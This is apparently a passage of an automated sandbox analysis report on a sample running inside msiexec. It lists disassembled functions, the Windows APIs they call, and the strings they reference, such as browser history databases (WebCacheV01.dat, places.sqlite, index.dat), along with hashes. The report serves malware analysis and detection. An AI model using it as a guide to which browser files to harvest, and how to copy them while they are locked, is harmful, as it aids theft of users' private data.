                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                          • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                          • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                          • API String ID: 3354267031-2114579845
                                                                                                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                          Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                          • API String ID: 2221118986-1725073988
                                                                                                                                                                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                          Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                                                                                                          • String ID: $$8
                                                                                                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                                                                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75082EE0), ref: 0040E3EC
                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1979745280-0
                                                                                                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1355100292-0
                                                                                                                                                                                                          • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                          Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProcVersionmemsetwcscpy
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                          • API String ID: 4182280571-2036018995
                                                                                                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                                                                                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3397143404-0
                                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
